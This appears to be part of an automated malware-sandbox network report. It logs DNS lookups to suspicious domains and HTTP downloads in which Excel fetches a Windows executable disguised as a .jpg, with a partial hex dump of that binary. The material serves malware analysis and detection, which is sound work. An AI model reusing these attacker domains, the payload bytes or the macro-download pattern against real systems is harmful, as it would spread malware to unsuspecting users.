                                                                                                                                                                                                              Jul 6, 2021 15:34:26.511986971 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:26.512057066 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:26.512104034 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:26.512763977 CEST4434917413.224.92.73192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:26.656091928 CEST4917580192.168.2.22172.67.213.115
                                                                                                                                                                                                              Jul 6, 2021 15:34:26.701879025 CEST8049175172.67.213.115192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:26.702704906 CEST4917580192.168.2.22172.67.213.115
                                                                                                                                                                                                              Jul 6, 2021 15:34:26.702739000 CEST4917580192.168.2.22172.67.213.115
                                                                                                                                                                                                              Jul 6, 2021 15:34:26.724927902 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:26.743724108 CEST8049175172.67.213.115192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:27.475414038 CEST8049175172.67.213.115192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:27.475908995 CEST8049175172.67.213.115192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:27.475946903 CEST8049175172.67.213.115192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:27.478533983 CEST4917580192.168.2.22172.67.213.115
                                                                                                                                                                                                              Jul 6, 2021 15:34:28.012347937 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:34:28.013371944 CEST4917380192.168.2.22172.67.213.115
                                                                                                                                                                                                              Jul 6, 2021 15:34:29.655917883 CEST4917580192.168.2.22172.67.213.115
                                                                                                                                                                                                              Jul 6, 2021 15:34:29.656007051 CEST49174443192.168.2.2213.224.92.73
                                                                                                                                                                                                              Jul 6, 2021 15:36:15.342017889 CEST4916980192.168.2.22104.21.55.83
                                                                                                                                                                                                              Jul 6, 2021 15:36:15.342361927 CEST4916880192.168.2.22104.21.12.122
                                                                                                                                                                                                              Jul 6, 2021 15:36:15.342642069 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                                              Jul 6, 2021 15:36:15.382076025 CEST8049168104.21.12.122192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:36:15.382122993 CEST8049167172.67.198.51192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:36:15.382137060 CEST8049169104.21.55.83192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:36:15.382312059 CEST4916880192.168.2.22104.21.12.122
                                                                                                                                                                                                              Jul 6, 2021 15:36:15.382384062 CEST4916780192.168.2.22172.67.198.51
                                                                                                                                                                                                              Jul 6, 2021 15:36:15.382388115 CEST4916980192.168.2.22104.21.55.83

                                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.358223915 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.422434092 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.600138903 CEST5309953192.168.2.228.8.8.8
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.661885977 CEST53530998.8.8.8192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.833409071 CEST5283853192.168.2.228.8.8.8
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.897286892 CEST53528388.8.8.8192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:16.939002991 CEST6120053192.168.2.228.8.8.8
                                                                                                                                                                                                              Jul 6, 2021 15:34:17.000349998 CEST53612008.8.8.8192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:17.035516024 CEST4954853192.168.2.228.8.8.8
                                                                                                                                                                                                              Jul 6, 2021 15:34:17.104618073 CEST53495488.8.8.8192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:19.047560930 CEST5562753192.168.2.228.8.8.8
                                                                                                                                                                                                              Jul 6, 2021 15:34:19.109076023 CEST53556278.8.8.8192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:19.116978884 CEST5600953192.168.2.228.8.8.8
                                                                                                                                                                                                              Jul 6, 2021 15:34:19.204956055 CEST53560098.8.8.8192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:21.444152117 CEST6186553192.168.2.228.8.8.8
                                                                                                                                                                                                              Jul 6, 2021 15:34:21.500411987 CEST53618658.8.8.8192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:21.513113976 CEST5517153192.168.2.228.8.8.8
                                                                                                                                                                                                              Jul 6, 2021 15:34:21.567688942 CEST53551718.8.8.8192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:22.811141014 CEST5249653192.168.2.228.8.8.8
                                                                                                                                                                                                              Jul 6, 2021 15:34:22.865875959 CEST53524968.8.8.8192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:22.874213934 CEST5756453192.168.2.228.8.8.8
                                                                                                                                                                                                              Jul 6, 2021 15:34:22.932522058 CEST53575648.8.8.8192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:25.044548035 CEST6300953192.168.2.228.8.8.8
                                                                                                                                                                                                              Jul 6, 2021 15:34:25.099754095 CEST53630098.8.8.8192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:25.127584934 CEST5931953192.168.2.228.8.8.8
                                                                                                                                                                                                              Jul 6, 2021 15:34:25.184917927 CEST53593198.8.8.8192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:26.529043913 CEST5307053192.168.2.228.8.8.8
                                                                                                                                                                                                              Jul 6, 2021 15:34:26.584774017 CEST53530708.8.8.8192.168.2.22
                                                                                                                                                                                                              Jul 6, 2021 15:34:26.592408895 CEST5977053192.168.2.228.8.8.8
                                                                                                                                                                                                              Jul 6, 2021 15:34:26.654561043 CEST53597708.8.8.8192.168.2.22

                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.358223915 CEST192.168.2.228.8.8.80xfda2Standard query (0)thousandsyears.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.600138903 CEST192.168.2.228.8.8.80x5115Standard query (0)voopeople.funA (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.833409071 CEST192.168.2.228.8.8.80x78b6Standard query (0)uppercilio.funA (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:16.939002991 CEST192.168.2.228.8.8.80x6ca3Standard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:17.035516024 CEST192.168.2.228.8.8.80x9c65Standard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:19.047560930 CEST192.168.2.228.8.8.80xc62bStandard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:19.116978884 CEST192.168.2.228.8.8.80x2d4bStandard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:21.444152117 CEST192.168.2.228.8.8.80xa3a3Standard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:21.513113976 CEST192.168.2.228.8.8.80x4023Standard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:22.811141014 CEST192.168.2.228.8.8.80xb163Standard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:22.874213934 CEST192.168.2.228.8.8.80xcc9cStandard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:25.044548035 CEST192.168.2.228.8.8.80xc330Standard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:25.127584934 CEST192.168.2.228.8.8.80x6848Standard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:26.529043913 CEST192.168.2.228.8.8.80x8766Standard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:26.592408895 CEST192.168.2.228.8.8.80x4177Standard query (0)astrocycle.downloadA (IP address)IN (0x0001)

                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.422434092 CEST8.8.8.8192.168.2.220xfda2No error (0)thousandsyears.download172.67.198.51A (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.422434092 CEST8.8.8.8192.168.2.220xfda2No error (0)thousandsyears.download104.21.52.111A (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.661885977 CEST8.8.8.8192.168.2.220x5115No error (0)voopeople.fun104.21.12.122A (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.661885977 CEST8.8.8.8192.168.2.220x5115No error (0)voopeople.fun172.67.194.117A (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.897286892 CEST8.8.8.8192.168.2.220x78b6No error (0)uppercilio.fun104.21.55.83A (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.897286892 CEST8.8.8.8192.168.2.220x78b6No error (0)uppercilio.fun172.67.146.88A (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:17.000349998 CEST8.8.8.8192.168.2.220x6ca3No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:17.000349998 CEST8.8.8.8192.168.2.220x6ca3No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:17.000349998 CEST8.8.8.8192.168.2.220x6ca3No error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:17.104618073 CEST8.8.8.8192.168.2.220x9c65No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:17.104618073 CEST8.8.8.8192.168.2.220x9c65No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:17.104618073 CEST8.8.8.8192.168.2.220x9c65No error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:19.109076023 CEST8.8.8.8192.168.2.220xc62bNo error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:19.109076023 CEST8.8.8.8192.168.2.220xc62bNo error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:19.204956055 CEST8.8.8.8192.168.2.220x2d4bNo error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:19.204956055 CEST8.8.8.8192.168.2.220x2d4bNo error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:21.500411987 CEST8.8.8.8192.168.2.220xa3a3No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:21.500411987 CEST8.8.8.8192.168.2.220xa3a3No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:21.500411987 CEST8.8.8.8192.168.2.220xa3a3No error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:21.567688942 CEST8.8.8.8192.168.2.220x4023No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:21.567688942 CEST8.8.8.8192.168.2.220x4023No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:21.567688942 CEST8.8.8.8192.168.2.220x4023No error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:22.865875959 CEST8.8.8.8192.168.2.220xb163No error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:22.865875959 CEST8.8.8.8192.168.2.220xb163No error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:22.932522058 CEST8.8.8.8192.168.2.220xcc9cNo error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:22.932522058 CEST8.8.8.8192.168.2.220xcc9cNo error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:25.099754095 CEST8.8.8.8192.168.2.220xc330No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:25.099754095 CEST8.8.8.8192.168.2.220xc330No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:25.099754095 CEST8.8.8.8192.168.2.220xc330No error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:25.184917927 CEST8.8.8.8192.168.2.220x6848No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:25.184917927 CEST8.8.8.8192.168.2.220x6848No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:25.184917927 CEST8.8.8.8192.168.2.220x6848No error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:26.584774017 CEST8.8.8.8192.168.2.220x8766No error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:26.584774017 CEST8.8.8.8192.168.2.220x8766No error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:26.654561043 CEST8.8.8.8192.168.2.220x4177No error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                              Jul 6, 2021 15:34:26.654561043 CEST8.8.8.8192.168.2.220x4177No error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)

                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                              • thousandsyears.download
                                                                                                                                                                                                              • voopeople.fun
                                                                                                                                                                                                              • uppercilio.fun
                                                                                                                                                                                                              • astrocycle.download

                                                                                                                                                                                                              HTTP Packets

                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                              0192.168.2.2249167172.67.198.5180C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.474013090 CEST0OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                              Host: thousandsyears.download
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.524545908 CEST2INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Tue, 06 Jul 2021 13:34:15 GMT
                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                              Content-Length: 57856
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Content-Disposition: attachment; filename=lsdfik.fml
                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                              Age: 5885
                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=NQa%2FToNAe4OfSycDITeTcPRjCr99aolaLqyUrPFMG%2FPw1ZIxGpsbT0mJx%2FvTchvs%2BxnkydQR5YNN1ucst5YESuFDECWoL7Oed1NuA59e7643MxlLh0PYHC8Rt9YvlJfrDvHmcm4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 66a935a2ea894e3d-FRA
                                                                                                                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00
                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@.text(8: `.rdata~P>@@.data`@.pdata
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.524564981 CEST3INData Raw: 00 00 00 00 01 00 00 02 00 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                              Data Ascii: @@
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.524583101 CEST4INData Raw: b4 5a f6 89 05 6b dc 00 00 c7 84 24 a4 00 00 00 23 02 00 00 8b 05 5a dc 00 00 89 44 24 4c c7 84 24 ac 00 00 00 0b 00 00 00 8b 05 49 dc 00 00 35 89 b4 5a f6 89 05 3e dc 00 00 c7 84 24 a8 00 00 00 17 00 00 00 48 8b 15 78 dc 00 00 8b 05 22 dc 00 00
                                                                                                                                                                                                              Data Ascii: Zk$#ZD$L$I5Z>$Hx"AHT$ LA0ALT$ AH<<H$HL$@$G$G$GHHD$0$GD$/$GHD$@L$?${HD$@H
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.524597883 CEST6INData Raw: 89 84 24 90 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 18 48 89 8c 24 a8 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 8c 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 20 48 89 4c 24 70 0f b7 84 24 b2 00 00 00 89 84 24 88 01 00 00 48 83 7c 24 70 00 0f 84
                                                                                                                                                                                                              Data Ascii: $H$HIH$$$H$HI HL$p$$H|$p$$HL$pHIPHL$h$$HL$pfQHf$$$|HD$`$$xD$/$tHT$`$p$pALD$`D$/$l
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.524625063 CEST7INData Raw: 00 0f b7 84 24 b2 00 00 00 89 84 24 f8 00 00 00 8b 44 24 34 83 c8 02 89 44 24 34 c7 84 24 f4 00 00 00 89 b4 5a f6 e9 e5 00 00 00 8b 84 24 84 00 00 00 8b 4c 24 44 81 f1 89 b4 5a f6 39 c8 0f 85 57 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 f0 00 00
                                                                                                                                                                                                              Data Ascii: $$D$4D$4$Z$L$DZ9W$$H$H$HH$$D$4D$4$Zp$L$@Z9R$$H$H$HHw$$D$
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.524686098 CEST9INData Raw: 00 00 00 48 89 74 24 70 48 8b b4 24 a0 00 00 00 48 89 b4 24 60 03 00 00 48 8b b4 24 60 03 00 00 89 b4 24 6c 03 00 00 c7 84 24 84 00 00 00 00 00 00 00 8b 84 24 84 00 00 00 3b 84 24 80 00 00 00 0f 83 c4 00 00 00 48 8b 84 24 a0 00 00 00 48 89 84 24
                                                                                                                                                                                                              Data Ascii: Ht$pH$H$`H$`$l$$;$H$H$PH$P$\HL$pHL$xH$H$@H$@$LLD$xILD$xL$L$0L$0D$<LL$pILL$pL$L$ L$ D$,
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.524702072 CEST10INData Raw: 00 00 48 8b 94 24 a0 00 00 00 4c 8b 84 24 a8 00 00 00 41 8b 48 28 41 89 c8 4c 01 c2 48 89 54 24 50 48 8b 54 24 50 48 89 94 24 d0 01 00 00 48 8b 94 24 d0 01 00 00 89 94 24 dc 01 00 00 48 83 7c 24 50 00 0f 84 27 00 00 00 48 8b 44 24 50 48 8b 8c 24
                                                                                                                                                                                                              Data Ascii: H$L$AH(ALHT$PHT$PH$H$$H|$P'HD$PH$HGL$(HDD$(E1H$H$TE1DHD$@HD$@H$H$$H;L$@qH$H$H$$HL$@DLH
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.524718046 CEST11INData Raw: 00 00 00 8b 44 24 60 89 84 24 44 01 00 00 48 8b 4c 24 38 0f b7 41 16 83 e0 01 83 f8 00 0f 84 31 00 00 00 8b 44 24 60 89 84 24 40 01 00 00 c6 44 24 67 00 48 8b 4c 24 68 48 89 8c 24 30 01 00 00 48 8b 8c 24 30 01 00 00 89 8c 24 3c 01 00 00 e9 3d 00
                                                                                                                                                                                                              Data Ascii: D$`$DHL$8A1D$`$@D$gHL$hH$0H$0$<=HD$hH$ H$ $,D$gHL$hH$H$$D$`$HD$hH$H$$|$`MD$`$HL$@AD$TD$T$D$TT$`)
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.524748087 CEST13INData Raw: 86 00 00 00 48 8b 44 24 50 48 89 84 24 70 01 00 00 48 8b 84 24 70 01 00 00 89 84 24 7c 01 00 00 48 8b 4c 24 68 8b 01 89 c1 48 03 8c 24 88 00 00 00 48 89 4c 24 58 48 8b 4c 24 58 48 89 8c 24 60 01 00 00 48 8b 8c 24 60 01 00 00 89 8c 24 6c 01 00 00
                                                                                                                                                                                                              Data Ascii: HD$PH$pH$p$|HL$hH$HL$XHL$XH$`H$`$lHT$hBH$HT$@HT$@H$PH$P$\hH$$LHL$hAH$HL$XHL$XH$@H$@$HHT$XHT$@HT$@H$0H$0$<H
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.524775028 CEST14INData Raw: 0f b7 04 4a 44 89 c2 44 8b 04 91 44 89 c1 48 01 c8 48 89 44 24 30 48 8b 44 24 30 48 89 84 24 80 00 00 00 e9 70 00 00 00 48 8b 44 24 68 48 89 84 24 b8 00 00 00 48 8b 84 24 b8 00 00 00 89 84 24 c4 00 00 00 8b 44 24 4c 83 c0 01 89 44 24 4c e9 93 fe
                                                                                                                                                                                                              Data Ascii: JDDDHHD$0HD$0H$pHD$hH$H$$D$LD$LHD$hH$H$$HD$hH$H$$H$H$HH$LL$`DD$\T$[HL$PD$<HL$PHL$pHL$pL$|HL$PD$+
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.527399063 CEST16INData Raw: 48 8b 4c 24 30 48 89 8c 24 a0 00 00 00 48 8b 8c 24 a0 00 00 00 89 8c 24 ac 00 00 00 e9 63 ff ff ff 48 8b 44 24 30 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 89 84 24 9c 00 00 00 48 8b 44 24 50 48 89 84 24 80 00 00 00 48 8b 84 24 80 00 00 00
                                                                                                                                                                                                              Data Ascii: HL$0H$H$$cHD$0H$H$$HD$PH$H$$HD$hHD$hHHHT$HL$HD$HD$ HD$ D$,HL$H$H$$HD$H$H$$HL$HHHT$D$HL$H


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                              1192.168.2.2249168104.21.12.12280C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.707076073 CEST63OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                              Host: voopeople.fun
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Jul 6, 2021 15:34:15.761357069 CEST64INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Tue, 06 Jul 2021 13:34:15 GMT
                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                              Content-Length: 57856
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Content-Disposition: attachment; filename=lsdfik.fml
                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                              Age: 5884
                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Br5qITmK7KR5WQ%2BEK2GUF2OhhE7oHZy%2BBwGeVnakesJB4CD5KzwejZeo0P7vlpLpiZAX1mffAGTgFj1rIfVTNTMySqnj%2FLTQ8o21f3gYa3WSAFzGyLaJ9qmj9A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 66a935a45e4a4a92-FRA
